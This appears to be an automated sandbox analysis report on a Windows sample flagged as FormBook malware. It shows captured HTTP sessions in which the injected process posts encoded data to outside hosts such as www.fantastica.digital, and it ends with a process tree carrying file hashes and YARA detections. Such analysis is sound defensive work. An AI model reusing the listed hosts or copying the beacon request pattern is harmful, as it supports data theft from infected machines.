                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.d48dk.top/e60d/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 47 6a 55 6f 61 51 58 6c 62 6c 6b 4c 44 2b 6e 4f 36 43 70 79 48 35 56 68 39 58 5a 69 6a 51 57 4f 4e 4b 52 32 4a 42 4e 78 74 44 72 68 52 35 38 49 4b 64 39 71 62 4a 4e 69 42 36 62 43 62 30 4d 39 4e 48 63 48 41 6b 38 46 42 68 52 71 74 63 67 69 78 63 31 42 2b 68 71 44 61 67 4b 55 34 6d 6e 5a 50 75 68 57 76 46 63 34 39 7a 44 53 4d 75 54 48 44 74 4b 6a 53 6d 70 7a 64 67 48 4d 56 4b 6d 36 53 32 76 74 70 2f 6f 52 6e 65 46 57 58 62 43 54 62 63 37 59 4f 47 48 38 63 74 31 43 42 48 39 65 79 51 6d 52 38 59 76 6e 2f 6a 6c 58 68 78 42 34 7a 35 34 35 74 69 47 32 64 45 34 79 65 30 4b 59 46 6f 4a 7a 49 6c 7a 2f 74 50 2b 59 4f 71 4b 38 31 42 32 4c 4e 4a 50 5a 59 4a 4d 32 6d 49 35 56 70 43 51 76 68 41 35 6a 53 76 56 56 63 37 48 6c 53 70 6f 47 46 2f 58 35 2b 59 76 4a 59 30 79 6f 59 39 4b 41 77 48 56 4e 36 57 52 36 38 77 6c 2b 34 79 53 62 67 49 73 32 2b 43 77 4b 58 58 6b 39 41 59 34 41 59 36 7a 70 32 42 32 75 6a 6c 37 4d 44 45 2f 4a 72 59 35 62 55 47 69 54 47 50 31 76 78 43 76 63 7a 6a 2f 2b 43 [TRUNCATED]
                                                                    Dec 5, 2024 09:46:52.001822948 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:51 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    52 | 192.168.2.8 | 49761 | 154.23.184.207 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 5, 2024 09:46:53.139818907 CET | 514 | OUT | GET /e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.d48dk.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:54.675735950 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:54 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "66927002-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    53 | 192.168.2.8 | 49762 | 194.58.112.174 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:47:00.526082993 CET795OUTPOST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 37 58 4f 4d 42 44 43 79 44 48 4a 69 68 55 54 6e 6b 2f 67 65 52 68 48 49 78 6c 4a 75 32 6b 69 47 6f 38 52 73 45 61 4e 7a 51 74 79 50 53 43 57 76 70 72 50 34 39 53 58 52 59 30 7a 65 38 38 6f 39 4c 71 6c 4f 57 32 41 77 46 4f 35 72 47 65 6f 6b 64 59 6a 46 6e 49 4d 4d 61 51 4b 62 77 46 4c 31 57 34 59 78 32 79 75 64 49 68 38 44 6f 55 6f 2f 6e 35 6b 59 67 37 6c 37 36 6e 62 54 55 6d 74 37 62 58 46 49 6e 4d 33 68 6a 70 75 5a 32 57 6c 4d 42 36 68 6e 6d 4e 79 4f 4a 4c 58 73 4e 68 38 69 78 4c 79 4d 4a 77 71 47 71 70 58 44 4c 50 2b 30 50 56 62 73 4d 32 4b 44 69 2f 49 3d
                                                                    Data Ascii: dpy4vDKP=I/oBKjKkNFgq7XOMBDCyDHJihUTnk/geRhHIxlJu2kiGo8RsEaNzQtyPSCWvprP49SXRY0ze88o9LqlOW2AwFO5rGeokdYjFnIMMaQKbwFL1W4Yx2yudIh8DoUo/n5kYg7l76nbTUmt7bXFInM3hjpuZ2WlMB6hnmNyOJLXsNh8ixLyMJwqGqpXDLP+0PVbsM2KDi/I=
                                                                    Timestamp: Dec 5, 2024 09:47:01.837007999 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data: HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:01 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:47:01.837025881 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Timestamp: Dec 5, 2024 09:47:01.837044954 CET | Bytes transferred: 1202 | Direction: IN
                                                                    Data Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Session ID: 54
                                                                    Source IP: 192.168.2.8
                                                                    Source Port: 49763
                                                                    Destination IP: 194.58.112.174
                                                                    Destination Port: 80
                                                                    PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:47:03.727638960 CET | Bytes transferred: 815 | Direction: OUT
                                                                    Data: POST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 70 48 65 4d 44 67 61 79 4c 48 4a 68 38 6b 54 6e 74 66 67 53 52 68 37 49 78 68 52 2b 32 33 47 47 70 5a 74 73 46 66 68 7a 54 74 79 50 4b 53 57 71 6b 4c 50 78 39 54 72 76 59 31 66 65 38 38 73 39 4c 71 31 4f 57 46 6f 7a 44 65 35 54 48 75 6f 6d 53 34 6a 46 6e 49 4d 4d 61 52 72 4d 77 46 44 31 57 4a 49 78 33 54 75 65 46 42 38 45 70 55 6f 2f 74 5a 6c 54 67 37 6c 38 36 6c 6a 74 55 67 70 37 62 54 42 49 6e 39 33 69 74 5a 75 44 79 57 6c 66 51 4f 73 6f 6e 4f 4f 73 41 4e 54 41 4e 68 56 66 30 39 44 6d 54 53 69 41 70 70 2f 6f 4c 4d 57 43 4b 69 47 45 57 56 61 7a 38 6f 64 44 37 45 4d 71 70 4d 41 6f 70 37 47 54 4d 37 65 72 59 6d 65 6e
                                                                    Data Ascii: dpy4vDKP=I/oBKjKkNFgqpHeMDgayLHJh8kTntfgSRh7IxhR+23GGpZtsFfhzTtyPKSWqkLPx9TrvY1fe88s9Lq1OWFozDe5THuomS4jFnIMMaRrMwFD1WJIx3TueFB8EpUo/tZlTg7l86ljtUgp7bTBIn93itZuDyWlfQOsonOOsANTANhVf09DmTSiApp/oLMWCKiGEWVaz8odD7EMqpMAop7GTM7erYmen
                                                                    Timestamp: Dec 5, 2024 09:47:04.619647980 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data: HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:04 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:47:04.619810104 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Timestamp: Dec 5, 2024 09:47:04.619827032 CET | Bytes transferred: 1202 | Direction: IN
                                                                    Data Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Session ID: 55
                                                                    Source IP: 192.168.2.8
                                                                    Source Port: 49764
                                                                    Destination IP: 194.58.112.174
                                                                    Destination Port: 80
                                                                    PID: 5952
                                                                    Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Timestamp: Dec 5, 2024 09:47:06.796376944 CET | Bytes transferred: 1832 | Direction: OUT
                                                                    Data: POST /5srj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fantastica.digital
                                                                    Origin: http://www.fantastica.digital
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.fantastica.digital/5srj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 70 48 65 4d 44 67 61 79 4c 48 4a 68 38 6b 54 6e 74 66 67 53 52 68 37 49 78 68 52 2b 32 33 4f 47 6f 72 56 73 45 34 31 7a 53 74 79 50 47 79 57 72 6b 4c 4f 78 39 54 7a 6a 59 31 44 4f 38 2f 59 39 49 4a 4e 4f 64 51 63 7a 4b 65 35 54 43 65 6f 6c 64 59 69 48 6e 4d 68 48 61 52 62 4d 77 46 44 31 57 4b 41 78 77 43 75 65 48 42 38 44 6f 55 6f 7a 6e 35 6b 30 67 36 4e 7a 36 6a 2f 39 55 51 4a 37 59 7a 52 49 67 66 76 69 76 35 75 64 2f 32 6b 43 51 4a 6c 6f 6e 4b 6d 4b 41 4e 50 75 4e 67 68 66 33 4d 75 67 4e 41 4b 6a 7a 4b 66 71 54 4f 43 5a 46 67 53 31 58 6a 4f 42 6d 36 56 31 39 51 68 44 72 4d 6b 69 72 36 50 6f 61 76 4b 2f 53 6a 76 70 74 33 67 6f 32 44 30 52 33 34 63 54 57 43 65 79 49 45 53 38 4b 54 37 44 6d 6e 4a 68 6a 6a 61 57 4f 43 49 70 34 30 58 70 35 2b 6f 34 45 44 35 36 64 70 6b 43 48 51 71 59 58 55 35 73 53 42 30 4b 72 76 48 6c 68 53 42 2b 46 41 73 4a 67 52 42 77 31 61 65 6a 47 44 57 31 4b 50 58 2f 4b 36 56 44 46 35 57 68 47 77 65 73 46 70 41 57 70 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=[...] [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:47:07.713207006 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data: HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:07 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Timestamp: Dec 5, 2024 09:47:07.713260889 CET | Bytes transferred: 1236 | Direction: IN
                                                                    Data Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Timestamp: Dec 5, 2024 09:47:07.713274956 CET | Bytes transferred: 1202 | Direction: IN
                                                                    Data Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Target ID:0
                                                                    Start time:03:42:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Users\user\Desktop\SRT68.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SRT68.exe"
                                                                    Imagebase:0xfa0000
                                                                    File size:1'211'392 bytes
                                                                    MD5 hash:71829B1E3A8CC54976390920F8C9282B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:43:00
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SRT68.exe"
                                                                    Imagebase:0x260000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:03:43:02
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe"
                                                                    Imagebase:0x300000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:03:43:04
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\odbcconf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\odbcconf.exe"
                                                                    Imagebase:0xe0000
                                                                    File size:22'016 bytes
                                                                    MD5 hash:D567FFF92055255DBE43BF8F989A4B7E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
